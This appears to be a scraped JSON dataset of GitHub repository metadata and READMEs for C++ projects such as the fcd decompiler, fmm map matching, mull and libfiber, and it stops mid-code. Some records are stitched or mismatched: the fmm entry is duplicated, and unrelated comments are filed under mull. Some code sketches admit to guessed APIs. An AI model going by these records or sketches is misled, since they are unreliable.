{"data": [{"name": "fay59/fcd", "link": "https://github.com/fay59/fcd", "tags": ["llvm", "x86-64", "elf", "mach-o", "clang", "decompiler"], "stars": 662, "description": "An optimizing decompiler", "lang": "C++", "repo_lang": "", "readme": "# fcd\n\n[![Travis build status][3]][7]\n\n**Fcd** is an LLVM-based native program optimizing decompiler, released under an LLVM-style license. It started as a bachelor's degree senior project and carries forward its initial development philosophy of getting results fast. As such, it was architectured to have low coupling between distinct decompilation phases and to be highly hackable.\n\nFcd uses a [unique technique][4] to reliably translate machine code to LLVM IR. Currently, it only supports x86_64. Disassembly uses [Capstone][2]. It implements [pattern-independent structuring][1] to provide a goto-free output.\n\nFcd allows you to [write custom optimization passes][6] to help solve odd jobs. It also [accepts header files][5] to discover function prototypes.\n\n [1]: http://www.internetsociety.org/doc/no-more-gotos-decompilation-using-pattern-independent-control-flow-structuring-and-semantics\n [2]: https://github.com/aquynh/capstone\n [3]: https://travis-ci.org/zneak/fcd.svg?branch=master\n [4]: http://zneak.github.io/fcd/2016/02/16/lifting-x86-code.html\n [5]: http://zneak.github.io/fcd/2016/09/04/parsing-headers.html\n [6]: http://zneak.github.io/fcd/2016/02/21/csaw-wyvern.html\n [7]: https://travis-ci.org/zneak/fcd\n", "readme_type": "markdown", "hn_comments": "Why this old, abandoned decompiler? Current is remill/anvill/McSema by Trail of Bits:https://github.com/lifting-bits/remillhttps://github.com/lifting-bits/anvillhttps://github.com/lifting-bits/mcsema", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cyang-kth/fmm", "link": "https://github.com/cyang-kth/fmm", "tags": ["map-matching", "road-network", "map-match", "fmm", "parrallel-map-matching", "match", "gps", "python", "shapefile", "openstreetmap", "trajectory", "stmatch", "gis"], "stars": 662, "description": "Fast map matching, an open source framework in C++", "lang": "C++", "repo_lang": "", "readme": "
", "readme_type": "markdown", "hn_comments": "Why this old, abandoned decompiler? Current is remill/anvill/McSema by Trail of Bits:https://github.com/lifting-bits/remillhttps://github.com/lifting-bits/anvillhttps://github.com/lifting-bits/mcsema", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cyang-kth/fmm", "link": "https://github.com/cyang-kth/fmm", "tags": ["map-matching", "road-network", "map-match", "fmm", "parrallel-map-matching", "match", "gps", "python", "shapefile", "openstreetmap", "trajectory", "stmatch", "gis"], "stars": 662, "description": "Fast map matching, an open source framework in C++", "lang": "C++", "repo_lang": "", "readme": "
\n\n| Linux / macOS | Windows | Wiki | Docs |\n| ------------- | ------- | ------------- | ----------- |\n| [![Build Status](https://travis-ci.org/cyang-kth/fmm.svg?branch=master)](https://travis-ci.org/github/cyang-kth/fmm) | [![Build status](https://ci.appveyor.com/api/projects/status/8qee5c8iay75j1am?svg=true)](https://ci.appveyor.com/project/cyang-kth/fmm) | [![Wiki](https://img.shields.io/badge/wiki-website-blue.svg)](https://fmm-wiki.github.io/) | [![Documentation](https://img.shields.io/badge/docs-doxygen-blue.svg)](https://cyang-kth.github.io/fmm/) |\n\nFMM is an open source map matching framework in C++ and Python. It solves the problem of matching noisy GPS data to a road network. The design aims to maximize performance, scalability and functionality.\n\n### Online demo\n\nCheck the [online demo](https://fmm-demo.herokuapp.com/).\n\n### Features\n\n- **High performance**: C++ implementation using Rtree, optimized routing, parallel computing (OpenMP).\n- **Python API**: [jupyter-notebook](example/notebook) and [web app](example/web_demo)\n- **Scalability**: millions of GPS points and millions of road edges.\n- **Multiple data formats**:\n - Road network in OpenStreetMap or ESRI shapefile.\n - GPS data in Point CSV, Trajectory CSV and Trajectory Shapefile ([more details](https://fmm-wiki.github.io/docs/documentation/input/#gps-data)).\n- **Detailed matching information**: traversed path, geometry, individual matched edges, GPS error, etc. More information [here](https://fmm-wiki.github.io/docs/documentation/output/).\n- **Multiple algorithms**: [FMM](http://www.tandfonline.com/doi/full/10.1080/13658816.2017.1400548) (for small and mid-scale networks) and [STMatch](https://dl.acm.org/doi/abs/10.1145/1653771.1653820) (for large-scale road networks)\n- **Platform support**: Unix (Ubuntu), Mac and Windows (Cygwin environment).\n- **Hexagon match**: :tada: Match to Uber's [h3](https://github.com/uber/h3) Hexagonal Hierarchical Geospatial Indexing System. 
Check the [demo](example/h3).\n\nWe welcome contributions: feature requests, bug reports, or new map matching algorithms developed on top of the framework.\n\n### Screenshots of notebook\n\nMap match to OSM road network by drawing\n\n![fmm_draw](https://github.com/cyang-kth/fmm-examples/blob/master/img/fmm_draw.gif?raw=true)\n\nExplore the effect of candidate size k, search radius and GPS error\n\n![fmm_explore](https://github.com/cyang-kth/fmm-examples/blob/master/img/fmm_explore.gif?raw=true)\n\nExplore detailed map matching information\n\n![fmm_detail](https://github.com/cyang-kth/fmm-examples/blob/master/img/fmm_detail.gif?raw=true)\n\nExplore with dual map\n\n![dual_map](https://github.com/cyang-kth/fmm-examples/blob/master/img/dual_map.gif?raw=true)\n\nMap match to hexagon by drawing\n\n![hex_draw](https://github.com/cyang-kth/fmm-examples/blob/master/img/hex_draw.gif?raw=true)\n\nExplore the effect of hexagon level and interpolation\n\n![hex_explore](https://github.com/cyang-kth/fmm-examples/blob/master/img/hex_explore.gif?raw=true)\n\nThe source code for these screenshots is available at https://github.com/cyang-kth/fmm-examples.\n\n### Installation, examples, tutorial and API\n\n- Check [https://fmm-wiki.github.io/](https://fmm-wiki.github.io/) for installation and documentation.\n- Check [example](example) for simple examples of fmm.\n- :tada: Check [https://github.com/cyang-kth/fmm-examples](https://github.com/cyang-kth/fmm-examples)\nfor interactive map matching in notebooks.\n\n### Code docs for developers\n\nCheck [https://cyang-kth.github.io/fmm/](https://cyang-kth.github.io/fmm/)\n\n### Contact and citation\n\nCan Yang, Ph.D. student at KTH, Royal Institute of Technology in Sweden\n\nEmail: cyang(at)kth.se\n\nHomepage: https://people.kth.se/~cyang/\n\nFMM originates from an implementation of this paper [Fast map matching, an algorithm integrating hidden Markov model with precomputation](http://www.tandfonline.com/doi/full/10.1080/13658816.2017.1400548). A post-print version of the paper can be downloaded at [link](https://people.kth.se/~cyang/bib/fmm.pdf). Substantial new features have been added compared with the original paper. 
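\n\nTo make the workflow concrete (load a road network, build the routing graph, load the precomputed UBODT table, match one WKT trajectory), a minimal C++ sketch follows. The class names mirror the project's documented Python API, but the header paths and exact C++ signatures are assumptions; treat this as orientation and consult the wiki above for the authoritative API.\n\n```cpp
// match_one.cpp -- illustrative sketch only; header paths and signatures
// are assumptions inferred from the documented Python API.
#include <iostream>
#include "network/network.hpp"
#include "network/network_graph.hpp"
#include "mm/fmm/ubodt.hpp"
#include "mm/fmm/fmm_algorithm.hpp"

using namespace FMM::NETWORK;
using namespace FMM::MM;

int main() {
  // Road network stored as an ESRI shapefile with id/source/target fields.
  Network network("edges.shp", "id", "source", "target");
  NetworkGraph graph(network);

  // UBODT = precomputed upper-bounded origin-destination table used by FMM.
  auto ubodt = UBODT::read_ubodt_csv("ubodt.txt");

  FastMapMatch model(network, graph, ubodt);
  // k candidates, search radius and GPS error in the network's map units.
  FastMapMatchConfig config(8, 0.003, 0.0005);

  auto result = model.match_wkt("LINESTRING(0.2 2.0,0.4 2.0,0.6 2.0)", config);
  std::cout << "matched path of " << result.cpath.size() << " edges\n";
  return 0;
}
```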
\n\nPlease cite fmm in your publications if it helps your research:\n\n Can Yang & Gyozo Gidofalvi (2018) Fast map matching, an algorithm\n integrating hidden Markov model with precomputation, International Journal of Geographical Information Science, 32:3, 547-570, DOI: 10.1080/13658816.2017.1400548\n\nBibtex file\n\n```bibtex\n@article{Yang2018FastMM,\n title={Fast map matching, an algorithm integrating hidden Markov model with precomputation},\n author={Can Yang and Gyozo Gidofalvi},\n journal={International Journal of Geographical Information Science},\n year={2018},\n volume={32},\n number={3},\n pages={547 - 570}\n}\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mull-project/mull", "link": "https://github.com/mull-project/mull", "tags": ["mutation-testing", "llvm", "c", "c-plus-plus", "mutation-analysis", "jit", "fault-injection", "testing"], "stars": 662, "description": "Practical mutation testing and fault injection for C and C++", "lang": "C++", "repo_lang": "", "readme": "# Mull\n\nMull is a practical [mutation testing](https://mull.readthedocs.io/en/latest/MutationTestingIntro.html) tool for C and C++.\n\nFor installation and usage please refer to the latest documentation: https://mull.readthedocs.io\n\nFor support visit [this page](https://mull.readthedocs.io/en/latest/Support.html).\n\n## Join us in Discord\n\nHere is the invitation link to the Discord channel: https://discord.gg/Hphp7dW\n\n## Contributing\n\nHere is the starting point: [CONTRIBUTING.md](CONTRIBUTING.md)\n\n## Citation\n\n[Mull it over: mutation testing based on LLVM (preprint)](https://lowlevelbits.org/pdfs/Mull_Mutation_2018.pdf)\n\n```\n@INPROCEEDINGS{8411727, \nauthor={A. Denisov and S. Pankevich}, \nbooktitle={2018 IEEE International Conference on Software Testing, Verification and Validation Workshops (ICSTW)}, \ntitle={Mull It Over: Mutation Testing Based on LLVM}, \nyear={2018}, \nvolume={}, \nnumber={}, \npages={25-31}, \nkeywords={just-in-time;program compilers;program testing;program verification;mutations;Mull;LLVM IR;mutated programs;compiled programming languages;LLVM framework;LLVM JIT;tested program;mutation testing tool;Testing;Tools;Computer languages;Instruments;Runtime;Computer crashes;Open source software;mutation testing;llvm}, \ndoi={10.1109/ICSTW.2018.00024}, \nISSN={}, \nmonth={April},}\n```\n\n## Packages\n\n[![Hosted By: Cloudsmith](https://img.shields.io/badge/OSS%20hosting%20by-cloudsmith-blue?logo=cloudsmith&style=for-the-badge)](https://cloudsmith.com)\n\nHosting for precompiled packages is graciously provided by [Cloudsmith](https://cloudsmith.com).\n\n## Copyright\n\nCopyright (c) 2016-2022 Alex Denisov and Stanislav Pankevich . See LICENSE for details.\n", "readme_type": "markdown", "hn_comments": "Story of my life. At the moment I have 10+ projects (due the nature of my role). I make it work with a pen and a pad of paper.Every couple of days I go through and clean everything up, it helps to keep everything top of mind. So in that way the lack of ergonomics is a feature, not a bug.Try codecks.io which I found because one of the devs posted here. It's like Trello on steroids (imports Trello boards, too). We switched our complex product development to Codecks almost immediately and are lovin' it.Is it the same projects/ code for all clients? If so do they get the same built product? 1 backlog.Different code for different clients? 
Many backlogs.Projects share code base maybe?Then you need Prioritization, planning and if you don't have that as a prerequisite then do Kanban maybe.It sounds like you cannot split the team and depending you could just have 1 product owner or a proxy PO.If clients need to approve designs that's design and backlog grooming- once the story is ready move it into a ready state (tag or state attribute)If you're reactive then kanban works better than sprints but of course depends on your environment, product/project mix, support vs product dev, and team compositionI've worked at an agency that went fully into Agile and Scrum.When it worked well, we had a single sprint board with different product backlogs, with different PO's for each product (where possible). All dev work would go onto a single sprint board, and we'd all attack the highest priority story (where possible) until the dev work was complete. UX/UI were introduced into the team, and when it worked best they worked with the frontend developers to create designs and prototypes to be signed off, and this went through typical backlog grooming until it was ready to go fully into the sprint.In my experience, Scrum only works in an agency environment when \"the process\" is strict. All ceremonies/meetings run for the amount of time required, all clients are aware of the process and have a product owner on hand to speak to, standups are kept short and purely as a technical update, rather than a reporting meeting, and sprints are worked out properly and never overloaded, with sprint points being adjusted based on velocity.When we stuck to this process, everything worked brilliantly, and the way we worked felt more robust. Instead of everything coming across the line in one go, we were testing and releasing individual stories on time, and when things inevitably changed we adjusted where needed or told the client to wait until the next sprint.Of course, over time our management took liberties. Standups were attended by account managers (who decided they were no longer product owners) and turned into 30 mins+ reporting meetings, sprint retros and reviews stopped, and sprint planning was reduced to an hour. Additionally, we were asked to deliver part-way through a sprint and to deliver to UAT with no testing. The difference in delivery was night and day. We went from a team that could deliver quickly with ample testing time and enough of a break between sprints to not feel stressed, to a team of cowboys that deliver buggy code.why all the configurations is it access to screens or resources? like role based security?or personalization?different functionality that should maybe be a different app?Environmental. pointing to different resources in test versus prod?From my perspective it's the threshold effect: in every endeavor there is a threshold which is hard to reach, but it gets easier for one to replicate similar things after passing it.It is hard to find an important problem and create a viable mass market solution for it. By accomplishing this once, you get important skills such as time and project management, marketing and engineering skills etc. Acquiring those skills are hard work, but once you master them, you can apply those to everything you do. So naturally it gets easier to create new solutions.There might be a network effect too. Creating a great project might enlarge your network with other people who are creating important solutions. 
I think this would set you in an interesting position; people would come to you with their most important problems they wanted to see solved since you have a proven track record. Ideas breed ideas. This might help with finding another important problem worth solving.The most common thing about those creating great things time after time, is their production/consumption ratio. Humans tend to lean on consumption side and since the world is full of distraction we are wasting most of our valuable time on consuming info-junk. The over achievers I had a chance to meet were always skewed towards the production side. They almost always learned new things with a purpose. Also the threshold effect might be the cause of this high production/consumption ratio. Creating one great project might have created an emotional and hormonal concoction, a high, that motivates people to focus on creating things.Accomplishing one great task, those people has the confidence and swag that they can achieve another one. People around them would cheer them up instead of hindering their motivation by reminding them how hard that task is. They would not remind them that they might be wasting their time by tackling that huge problem. They would find eager help and funding when they need.Those are the first few things that came to my mind when I think about what factors might create multi-project programmers.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ppwwyyxx/speaker-recognition", "link": "https://github.com/ppwwyyxx/speaker-recognition", "tags": [], "stars": 662, "description": "A Speaker Recognition System ", "lang": "C++", "repo_lang": "", "readme": "## About\n\nThis is a [Speaker Recognition](https://en.wikipedia.org/wiki/Speaker_recognition) system with GUI.\n\nFor more details of this project, please see:\n\n+ Our [presentation slides](https://github.com/ppwwyyxx/speaker-recognition/raw/master/doc/Presentation.pdf)\n+ Our [complete report](https://github.com/ppwwyyxx/speaker-recognition/raw/master/doc/Final-Report-Complete.pdf)\n\n## Dependencies\n\nThe [Dockerfile](Dockerfile) can be used to get started with the project easier.\n\n+ Linux, Python 2\n+ [scikit-learn](http://scikit-learn.org/),\n [scikits.talkbox](http://scikits.appspot.com/talkbox), \n [pyssp](https://pypi.python.org/pypi/pyssp), \n [PyAudio](http://people.csail.mit.edu/hubert/pyaudio/):\n ```\n pip install --user scikit-learn scikits.talkbox pyssp PyAudio\n ```\n+ [PyQt4](http://sourceforge.net/projects/pyqt/), usually can be installed by\n your package manager.\n+ (Optional)Python bindings for [bob](http://idiap.github.io/bob/):\n\t+ install blitz, openblas, boost, then:\n\t```\n\tfor p in bob.extension bob.blitz bob.core bob.sp bob.ap; do\n\t\tpip install --user $p\n\tdone\n\t```\n\nNote: We have a MFCC implementation on our own\nwhich will be used as a fallback when bob is unavailable.\nBut it's not so efficient as the C implementation in bob.\n\n## Algorithms Used\n\n_Voice Activity Detection_(VAD):\n+ [Long-Term Spectral Divergence](http://www.sciencedirect.com/science/article/pii/S0167639303001201) (LTSD)\n\n_Feature_:\n+ [Mel-Frequency Cepstral Coefficient](http://en.wikipedia.org/wiki/Mel-frequency_cepstrum) (MFCC)\n+ [Linear Predictive Coding](http://en.wikipedia.org/wiki/Linear_predictive_coding) (LPC)\n\n_Model_:\n+ [Gaussian Mixture Model](http://en.wikipedia.org/wiki/Mixture_model#Gaussian_mixture_model) (GMM)\n+ [Universal Background 
Model](http://www.sciencedirect.com/science/article/pii/S1051200499903615) (UBM)\n+ Continuous [Restricted Boltzmann Machine](https://en.wikipedia.org/wiki/Restricted_Boltzmann_machine) (CRBM)\n+ [Joint Factor Analysis](http://speech.fit.vutbr.cz/software/joint-factor-analysis-matlab-demo) (JFA)\n\n## GUI Demo\n\nOur GUI has basic functionality for recording, enrollment, training and testing, plus a visualization of real-time speaker recognition:\n\n![graph](https://github.com/ppwwyyxx/speaker-recognition/raw/master/doc/Final-Report-Complete/img/gui-graph.png)\n\nYou can see our [demo video](https://github.com/ppwwyyxx/speaker-recognition/raw/master/demo.avi) (in Chinese).\nNote that real-time speaker recognition is extremely hard, because we only use about one second of audio to identify the speaker.\nTherefore the system is not perfectly accurate.\n\nThe GUI part is quite hacky, was written for demo purposes, and is no longer maintained.\nTake it as a reference, but don't expect it to work out of the box. Use the command line tools to try the algorithms instead.\n\n## Command Line Tools\n```sh\nusage: speaker-recognition.py [-h] -t TASK -i INPUT -m MODEL\n\nSpeaker Recognition Command Line Tool\n\noptional arguments:\n -h, --help show this help message and exit\n -t TASK, --task TASK Task to do. Either \"enroll\" or \"predict\"\n -i INPUT, --input INPUT\n Input Files(to predict) or Directories(to enroll)\n -m MODEL, --model MODEL\n Model file to save(in enroll) or use(in predict)\n\nWav files in each input directory will be labeled as the basename of the directory.\nNote that wildcard inputs should be *quoted*, and they will be sent to glob module.\n\nExamples:\n Train:\n ./speaker-recognition.py -t enroll -i \"./bob/ ./mary/ ./person*\" -m model.out\n\n Predict:\n ./speaker-recognition.py -t predict -i \"./*.wav\" -m model.out\n```\n
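\n## Prediction rule (illustration)\n\nPrediction reduces to a simple decision rule: score the utterance's feature frames (e.g. MFCC vectors) against every enrolled speaker's GMM and return the speaker with the highest average log-likelihood. The project does this in Python with scikit-learn; the self-contained C++ toy below, with a hypothetical diagonal-covariance GMM standing in for the trained models, only illustrates the rule itself:\n\n```cpp
// predict.cpp -- toy illustration of the decision rule; the real project
// trains and scores GMMs in Python with scikit-learn.
#include <cmath>
#include <iostream>
#include <limits>
#include <map>
#include <string>
#include <vector>

struct Gaussian { std::vector<double> mean, var; double weight; };
using GMM = std::vector<Gaussian>;  // diagonal-covariance mixture

// Log-likelihood of one feature frame under a GMM.
double frame_loglik(const GMM& gmm, const std::vector<double>& x) {
    const double two_pi = 6.283185307179586;
    double p = 0.0;
    for (const Gaussian& g : gmm) {
        double logp = std::log(g.weight);
        for (size_t d = 0; d < x.size(); ++d) {
            double diff = x[d] - g.mean[d];
            logp -= 0.5 * (std::log(two_pi * g.var[d]) + diff * diff / g.var[d]);
        }
        p += std::exp(logp);
    }
    return std::log(p);
}

// Score every enrolled speaker's model; the best average log-likelihood wins.
std::string predict(const std::map<std::string, GMM>& speakers,
                    const std::vector<std::vector<double>>& frames) {
    std::string best;
    double best_score = -std::numeric_limits<double>::infinity();
    for (const auto& entry : speakers) {
        double s = 0.0;
        for (const auto& f : frames) s += frame_loglik(entry.second, f);
        s /= frames.size();
        if (s > best_score) { best_score = s; best = entry.first; }
    }
    return best;
}

int main() {
    // Two toy one-dimensional "speakers" and three one-dimensional "frames".
    std::map<std::string, GMM> speakers{
        {"alice", {Gaussian{{0.0}, {1.0}, 1.0}}},
        {"bob",   {Gaussian{{5.0}, {1.0}, 1.0}}}};
    std::vector<std::vector<double>> frames{{4.8}, {5.1}, {5.3}};
    std::cout << predict(speakers, frames) << "\n";  // prints "bob"
    return 0;
}
```\n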
", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "iqiyi/libfiber", "link": "https://github.com/iqiyi/libfiber", "tags": ["coroutines", "epoll", "kqueue", "iocp", "select", "poll", "gui-coroutine", "coroutine", "fiber"], "stars": 661, "description": "The high performance coroutine library for Linux/FreeBSD/MacOS/Windows, supporting select/poll/epoll/kqueue/iocp/windows GUI", "lang": "C++", "repo_lang": "", "readme": "# A high-performance network coroutine library for Linux/BSD/Mac/Windows\n\n## Overview\nThis coroutine library comes from the coroutine module of the [acl project](https://github.com/acl-dev/acl). The supported operating systems are Linux, FreeBSD, MacOS and Windows, and the supported event types are select, poll, epoll, kqueue, iocp and Windows GUI window messages. With the libfiber network coroutine library, users can very easily write high-performance, highly reliable network services. Because it follows a synchronous, sequential programming style, writing network applications is much simpler than with asynchronous models (whether reactor or proactor).\nlibfiber supports not only the common IO event engines but also the Win32 GUI message engine, so writing GUI network applications with MFC, WTL or other GUI libraries becomes remarkably simple as well, which is genuinely exciting.\n\n## Which event engines are supported?\nThe event engines supported by libfiber are:\n\nEvent|Linux|BSD|Mac|Windows\n-----|----|------|---|---\nselect|yes|yes|yes|yes\npoll|yes|yes|yes|yes\nepoll|yes|no|no|no\nkqueue|no|yes|yes|no\niocp|no|no|no|yes\nWin GUI message|no|no|no|yes\n\n## Examples\n\n### A coroutine-based network server\n\n```C\n// fiber_server.c\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <assert.h>\n#include \"fiber/lib_fiber.h\"\n#include \"patch.h\" // in the samples path\n\nstatic size_t __stack_size = 128000;\nstatic const char *__listen_ip = \"127.0.0.1\";\nstatic int __listen_port = 9001;\n\nstatic void fiber_client(ACL_FIBER *fb, void *ctx)\n{\n\tSOCKET *pfd = (SOCKET *) ctx;\n\tchar buf[8192];\n\n\twhile (1) {\n#if defined(_WIN32) || defined(_WIN64)\n\t\tint ret = acl_fiber_recv(*pfd, buf, sizeof(buf), 0);\n#else\n\t\tint ret = recv(*pfd, buf, sizeof(buf), 0);\n#endif\n\t\tif (ret == 0) {\n\t\t\tbreak;\n\t\t} else if (ret < 0) {\n\t\t\tif (acl_fiber_last_error() == FIBER_EINTR) {\n\t\t\t\tcontinue;\n\t\t\t}\n\t\t\tbreak;\n\t\t}\n#if defined(_WIN32) || defined(_WIN64)\n\t\tif (acl_fiber_send(*pfd, buf, ret, 0) < 0) {\n#else\n\t\tif (send(*pfd, buf, ret, 0) < 0) {\n#endif\t\t\t\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tsocket_close(*pfd);\n\tfree(pfd);\n}\n\nstatic void fiber_accept(ACL_FIBER *fb, void *ctx)\n{\n\tconst char *addr = (const char *) ctx;\n\tSOCKET lfd = socket_listen(__listen_ip, __listen_port);\n\n\tassert(lfd >= 0);\n\n\tfor (;;) {\n\t\tSOCKET *pfd, cfd = socket_accept(lfd);\n\t\tif (cfd == INVALID_SOCKET) {\n\t\t\tprintf(\"accept error %s\\r\\n\", acl_fiber_last_serror());\n\t\t\tbreak;\n\t\t}\n\t\tpfd = (SOCKET *) malloc(sizeof(SOCKET));\n\t\t*pfd = cfd;\n\n\t\t// create and start one fiber to handle the client socket IO\n\t\tacl_fiber_create(fiber_client, pfd, __stack_size);\n\t}\n\n\tsocket_close(lfd);\n\texit (0);\n}\n\n// FIBER_EVENT_KERNEL represents the event type on\n// Linux(epoll), BSD(kqueue), Mac(kqueue), Windows(iocp)\n// FIBER_EVENT_POLL: poll on Linux/BSD/Mac/Windows\n// FIBER_EVENT_SELECT: select on Linux/BSD/Mac/Windows\n// FIBER_EVENT_WMSG: Win GUI message on Windows\n// acl_fiber_create/acl_fiber_schedule_with are in `lib_fiber.h`.\n// socket_listen/socket_accept/socket_close are in patch.c of the samples path.\n\nint main(void)\n{\n\tint event_mode = FIBER_EVENT_KERNEL;\n\n#if defined(_WIN32) || defined(_WIN64)\n\tsocket_init();\n#endif\n\n\t// create one fiber to accept connections\n\tacl_fiber_create(fiber_accept, NULL, __stack_size);\n\n\t// start the fiber schedule process\n\tacl_fiber_schedule_with(event_mode);\n\n#if defined(_WIN32) || defined(_WIN64)\n\tsocket_end();\n#endif\n\n\treturn 0;\n}\n```\n
\n### A coroutine-based client program\n\n```C\n// fiber_client.c\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include \"fiber/lib_fiber.h\"\n#include \"patch.h\" // in the samples path\n\nstatic const char *__server_ip = \"127.0.0.1\";\nstatic int __server_port = 9001;\n\n// socket_init/socket_end/socket_connect/socket_close are in patch.c of the samples path\n\nstatic void fiber_client(ACL_FIBER *fb, void *ctx)\n{\n\tSOCKET cfd = socket_connect(__server_ip, __server_port);\n\tconst char *s = \"hello world\\r\\n\";\n\tchar buf[8192];\n\tint i, ret;\n\n\tif (cfd == INVALID_SOCKET) {\n\t\treturn;\n\t}\n\n\tfor (i = 0; i < 1024; i++) {\n#if defined(_WIN32) || defined(_WIN64)\n\t\tif (acl_fiber_send(cfd, s, strlen(s), 0) <= 0) {\n#else\n\t\tif (send(cfd, s, strlen(s), 0) <= 0) {\n#endif\t\t\t\n\t\t\tprintf(\"send error %s\\r\\n\", acl_fiber_last_serror());\n\t\t\tbreak;\n\t\t}\n\n#if defined(_WIN32) || defined(_WIN64)\n\t\tret = acl_fiber_recv(cfd, buf, sizeof(buf), 0);\n#else\n\t\tret = recv(cfd, buf, sizeof(buf), 0);\n#endif\t\t\n\t\tif (ret <= 0) {\n\t\t\tbreak;\n\t\t}\n\t}\n\n#if defined(_WIN32) || defined(_WIN64)\n\tacl_fiber_close(cfd);\n#else\n\tclose(cfd);\n#endif\n}\n\nint main(void)\n{\n\tint event_mode = FIBER_EVENT_KERNEL;\n\tsize_t stack_size = 128000;\n\n\tint i;\n\n#if defined(_WIN32) || defined(_WIN64)\n\tsocket_init();\n#endif\n\n\tfor (i = 0; i < 100; i++) {\n\t\tacl_fiber_create(fiber_client, NULL, stack_size);\n\t}\n\n\tacl_fiber_schedule_with(event_mode);\n\n#if defined(_WIN32) || defined(_WIN64)\n\tsocket_end();\n#endif\n\n\treturn 0;\n}\n```\n\n### A coroutine-based Windows GUI network program\nThe [samples directory](samples/WinEchod) contains a coroutine-based Windows GUI network program; a screenshot of it running is shown here: ![screenshot](res/winecho.png)\n\nThis Windows GUI program provides both a `network server` and a `network client`. At runtime the server and client modules run in the Windows GUI thread; because the coroutine library uses the Windows GUI message pump, the coroutine modules can live `together` with the UI elements in a single thread, with no cross-thread calls and no need for the troublesome asynchronous socket APIs.\n\n### More examples\nThe [samples](samples/) directory contains examples showing how to use the APIs provided by libfiber for network programming. In addition, the [acl project](https://github.com/acl-dev/acl/tree/master/lib_fiber/samples) has many more examples of coroutine-based network programming; of course, those examples also make heavy use of APIs from other modules of the [acl library](https://github.com/acl-dev/acl/).\n\n## Building libfiber\n### Building on Unix platforms\n\n```\n$cd libfiber\n$make\n$cd samples\n$make\n```\n\nA sample Makefile looks like this:\n\n```\nfiber_server: fiber_server.c\n\tgcc -o fiber_server fiber_server.c patch.c -I{path_of_fiber_header} -L{path_of_fiber_lib} -lfiber -ldl -lpthread\n\nfiber_client: fiber_client.c\n\tgcc -o fiber_client fiber_client.c patch.c -I{path_of_fiber_header} -L{path_of_fiber_lib} -lfiber -ldl -lpthread\n```\n\n### Building on Windows\nOpen [fiber_vc2012.sln](c/fiber_vc2012.sln), [fiber_vc2013.sln](c/fiber_vc2013.sln) or [fiber_vc2015.sln](c/fiber_vc2015.sln) with vc2012, vc2013 or vc2015 respectively to build the libfiber library.\n
\n## Performance\nBelow is a simple IOPS (network IO throughput) benchmark, together with a simple comparison against other coroutine libraries: \n![Benchmark](res/benchmark.png) \nThe other network coroutine libraries compared are [libmill](https://github.com/sustrik/libmill), golang and [libco](https://github.com/Tencent/libco). The benchmark cases for each library:\n1. The benchmark cases for libmill and libco are in the [benchmark directory](benchmark);\n2. The benchmark case for Golang is in [this directory](https://github.com/acl-dev/master-go/tree/master/examples/echo);\n3. The benchmark case for libfiber: [sample](samples/server);\n4. The client-side benchmark program: https://github.com/acl-dev/acl/tree/master/lib_fiber/samples/client2\n\n## API list \n\n### Base API \n- acl_fiber_create \n- acl_fiber_self \n- acl_fiber_status \n- acl_fiber_kill \n- acl_fiber_killed \n- acl_fiber_signal \n- acl_fiber_yield \n- acl_fiber_ready \n- acl_fiber_switch \n- acl_fiber_schedule_init \n- acl_fiber_schedule \n- acl_fiber_schedule_with \n- acl_fiber_scheduled \n- acl_fiber_schedule_stop \n- acl_fiber_set_specific \n- acl_fiber_get_specific \n- acl_fiber_delay \n- acl_fiber_last_error \n- acl_fiber_last_serror \n\n### IO API\n- acl_fiber_recv \n- acl_fiber_recvfrom \n- acl_fiber_read \n- acl_fiber_readv \n- acl_fiber_recvmsg \n- acl_fiber_write \n- acl_fiber_writev \n- acl_fiber_send \n- acl_fiber_sendto \n- acl_fiber_sendmsg \n- acl_fiber_select \n- acl_fiber_poll \n- acl_fiber_close \n\n### Net API\n- acl_fiber_socket \n- acl_fiber_listen \n- acl_fiber_accept \n- acl_fiber_connect \n- acl_fiber_gethostbyname_r\n- acl_fiber_getaddrinfo\n- acl_fiber_freeaddrinfo\n\n### Channel API \n- acl_channel_create \n- acl_channel_free \n- acl_channel_send \n- acl_channel_send_nb \n- acl_channel_recv \n- acl_channel_recv_nb \n- acl_channel_sendp \n- acl_channel_recvp \n- acl_channel_sendp_nb \n- acl_channel_recvp_nb \n- acl_channel_sendul \n- acl_channel_recvul \n- acl_channel_sendul_nb \n- acl_channel_recvul_nb \n\n### Sync API\nACL_FIBER_MUTEX \n- acl_fiber_mutex_create \n- acl_fiber_mutex_free \n- acl_fiber_mutex_lock \n- acl_fiber_mutex_trylock \n- acl_fiber_mutex_unlock \n\nACL_FIBER_RWLOCK \n- acl_fiber_rwlock_create \n- acl_fiber_rwlock_free \n- acl_fiber_rwlock_rlock \n- acl_fiber_rwlock_tryrlock \n- acl_fiber_rwlock_wlock \n- acl_fiber_rwlock_trywlock \n- acl_fiber_rwlock_runlock \n- acl_fiber_rwlock_wunlock \n\nACL_FIBER_EVENT \n- acl_fiber_event_create \n- acl_fiber_event_free \n- acl_fiber_event_wait \n- acl_fiber_event_trywait \n- acl_fiber_event_notify \n\nACL_FIBER_SEM \n- acl_fiber_sem_create \n- acl_fiber_sem_free \n- acl_fiber_sem_wait \n- acl_fiber_sem_post \n- acl_fiber_sem_num\n
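\n### Channel example (sketch)\n\nAs a quick taste of the Channel API above, here is a minimal producer/consumer sketch. The `acl_channel_*` names come from the list above, but the `ACL_CHANNEL` type name and the exact signatures (element size and capacity arguments) are assumptions; consult the headers under `fiber/` for the authoritative declarations.\n\n```cpp
// channel_demo.cpp -- minimal sketch of the channel API; the acl_channel_*
// signatures used here (element size + capacity, unsigned long transfer)
// are assumptions, so check the fiber headers before relying on them.
#include <stdio.h>
#include "fiber/lib_fiber.h"

static ACL_CHANNEL *chan;

static void producer(ACL_FIBER *fb, void *ctx) {
    for (unsigned long i = 0; i < 10; i++) {
        acl_channel_sendul(chan, i);  // blocks only this fiber, not the thread
    }
}

static void consumer(ACL_FIBER *fb, void *ctx) {
    for (int i = 0; i < 10; i++) {
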